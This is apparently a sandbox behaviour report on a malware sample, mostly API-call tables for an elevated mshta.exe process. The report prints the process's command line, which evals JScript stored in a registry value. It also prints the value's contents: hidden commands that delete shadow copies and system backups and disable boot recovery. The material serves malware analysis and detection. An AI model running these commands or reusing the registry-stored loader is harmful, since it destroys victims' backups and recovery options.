2 | |
| System | Get Time | type = Ticks, time = 281750 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 282156 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 282328 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 282421 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 282609 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 283187 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 283281 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 283703 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 283843 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 284078 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 284515 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 284750 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 285140 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 285875 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 286015 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 286593 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 286843 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 287187 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 287343 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 287500 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 287796 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 288156 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xec4
3
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\jscript9.dll, base_address = 0x716a0000 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25884893236 |
|
1 | |
| System | Get Time | type = Ticks, time = 258828 |
|
1 |
Thread 0xfa0
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| System | Get Time | type = Ticks, time = 257750 |
|
1 |
Process #11: mshta.exe
448
1
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\mshta.exe |
| Command Line | mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\CADHC\\SH[YU'));close();" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:10, Reason: Child Process |
| Unmonitor | End Time: 00:04:23, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xec8 |
| Parent PID | 0x6cc (c:\users\fd1hvy\appdata\roaming\osk.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
15C
0x
B08
0x
210
0x
A70
0x
4F0
0x
D34
0x
C6C
0x
720
0x
F68
0x
6C0
0x
D90
0x
EF8
0x
F6C
0x
83C
0x
ECC
0x
2B0
0x
9E0
0x
EB4
0x
EF4
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| jscript9.dll | 0x716A0000 | 0x71A24FFF | Marked Writable | - | 32-bit | - |
|
|
|
| mshta.exe | 0x01320000 | 0x01327FFF | Forced | - | 32-bit | - |
|
|
|
Threads
Thread 0x15c
271
1
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75ea5850 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Environment | Get Environment String | name = JS_DEBUG_SCOPE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\mshta.exe, base_address = 0x1320000 |
|
1 | |
| System | Get Time | type = Ticks, time = 254734 |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75ea5850 |
|
1 | |
| File | Open Mapping | filename = #MSHTML#PERF#00000EC8, desired_access = FILE_MAP_WRITE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE, value_name = Path, type = REG_NONE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\mshta.exe, base_address = 0x1320000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\mshta.exe, process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility, value_name = mshta.exe, type = REG_NONE |
|
1 | |
| System | Get Info | - |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = -16, new_long = -2100363264 |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x74b70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetCoalescableTimer, address_out = 0x74ba3c80 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\WINDOWS |
|
1 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x72440000 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
3 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| System | Get Time | type = Ticks, time = 255359 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25539341518 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID_NAME, result_out = 00000409 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x74100000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = 471, address_out = 0x741845d0 |
|
1 | |
| Module | Load | module_name = WLDP.DLL, base_address = 0x723e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x723e3c20 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25558744524 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:29 (UTC) |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25558754851 |
|
1 | |
| URL | Query Info | url = javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\CADHC\\SH[YU'));close();, query_options = QUERY_IS_SECURE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\Users\S-1-5-21-1051304884-625712362-2192934891-1000 |
|
1 | |
| COM | Create | interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Window | Create | wndproc_parameter = 18284544 |
|
1 | |
| Window | Set Attribute | index = -21, new_long = 18284544 |
|
1 | |
| Module | Load | module_name = ext-ms-win-ntuser-touch-hittest-l1-1-0.dll, base_address = 0x74b70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterTouchHitTestingWindow, address_out = 0x74ba3b50 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25561899219 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25561959519 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25561984723 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25561991140 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25561997495 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25562031651 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25562040719 |
|
1 | |
| System | Get Time | type = Ticks, time = 255578 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25562127682 |
|
1 | |
| Window | Create | wndproc_parameter = 18146000 |
|
1 | |
| Window | Set Attribute | index = -21, new_long = 18146000 |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, SEC_COMMIT, maximum_size = 40 |
|
1 | |
| Module | Map | process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| Module | Map | process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Module | Load | module_name = OLEACC.DLL, base_address = 0x71fa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleacc.dll, function = LresultFromObject, address_out = 0x71faf590 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Module | Load | module_name = mshtml.dll, base_address = 0x726c0000 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25613706688 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25613795022 |
|
1 | |
| COM | Create | interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = JS_DEBUG_SCOPE |
|
1 | |
| Debug | Check for Presence | c:\windows\syswow64\mshta.exe |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\System32\jscript9.dll, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x74f71cd0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643851793 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643864087 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643878532 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643889644 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643903219 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643914278 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643919465 |
|
1 | |
| System | Get Time | type = Ticks, time = 256406 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25655747833 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernelbase.dll, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x74f9a730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7500d8e0 |
|
1 | |
| Environment | Get Environment String | name = JS_PROFILER |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:30 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 256531 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:30 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 256531 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:30 (UTC) |
|
1 | |
| COM | Create | interface = 8F88FD19-5D42-477B-BD45-F6A4A977ED05, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:30 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 256531 |
|
3 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 261 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\CADHC |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\CADHC, value_name = SH[YU, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\CADHC, value_name = SH[YU, data = o=new ActiveXObject("WScript.Shell");o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);, type = REG_SZ |
|
1 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 261 |
|
1 | |
| System | Get Time | type = Ticks, time = 257687 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 257687 |
|
3 | |
| Module | Load | module_name = shell32.dll, base_address = 0x76480000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x765e4730 |
|
1 | |
| Process | Create | process_name = cmd.exe, show_window = SW_HIDE |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25792785016 |
|
1 | |
| System | Get Time | type = Ticks, time = 257890 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25792921452 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25792963262 |
|
1 | |
| System | Get Time | type = Ticks, time = 257968 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25800422490 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800441982 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800509608 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800516181 |
|
1 | |
| System | Get Time | type = Ticks, time = 257968 |
|
3 | |
| System | Get Time | type = Performance Ctr, time = 25800586068 |
|
1 | |
| System | Get Time | type = Ticks, time = 257968 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25800846578 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800853570 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800869271 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800875788 |
|
1 | |
| System | Get Time | type = Ticks, time = 257968 |
|
4 | |
| System | Get window text | window_text = 4049164 |
|
1 | |
| Process | Create | process_name = cmd.exe, show_window = SW_HIDE |
|
1 | |
| Process | Create | process_name = cmd.exe, show_window = SW_HIDE |
|
1 | |
| Process | Create | process_name = cmd.exe, show_window = SW_HIDE |
|
1 | |
| Process | Create | process_name = cmd.exe, show_window = SW_HIDE |
|
1 | |
| Window | Create | class_name = WorkerW, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | class_name = WorkerW, index = 0, new_long = 9756944 |
|
1 | |
| Window | Set Attribute | class_name = WorkerW, index = -4, new_long = 1926608192 |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:36 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 263218 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:36 (UTC) |
|
1 | |
| System | Get Cursor | x_out = 492, y_out = 352 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 492, y_out = 352 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Window | Set Attribute | index = -21, new_long = 0 |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\mshta.exe |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
4 |
Thread 0x210
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 |
Thread 0xa70
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 |
Thread 0x4f0
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xc6c
153
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Performance Ctr, time = 25565211141 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25567138837 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25567163046 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25568724355 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25568755999 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25570269496 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25570294603 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25573411399 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25573437729 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25576514097 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25576538272 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25578301633 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25578329132 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25581402866 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25581426451 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25582773358 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25582801191 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25585947715 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25585972484 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25591193159 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25591221017 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25591322182 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25591345849 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25593698726 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25593710594 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25596900236 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25596911816 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25598500104 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25598516625 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25601572545 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25601705471 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25605264773 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25605279647 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25606276059 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25606288039 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25609357644 |
|
1 | |
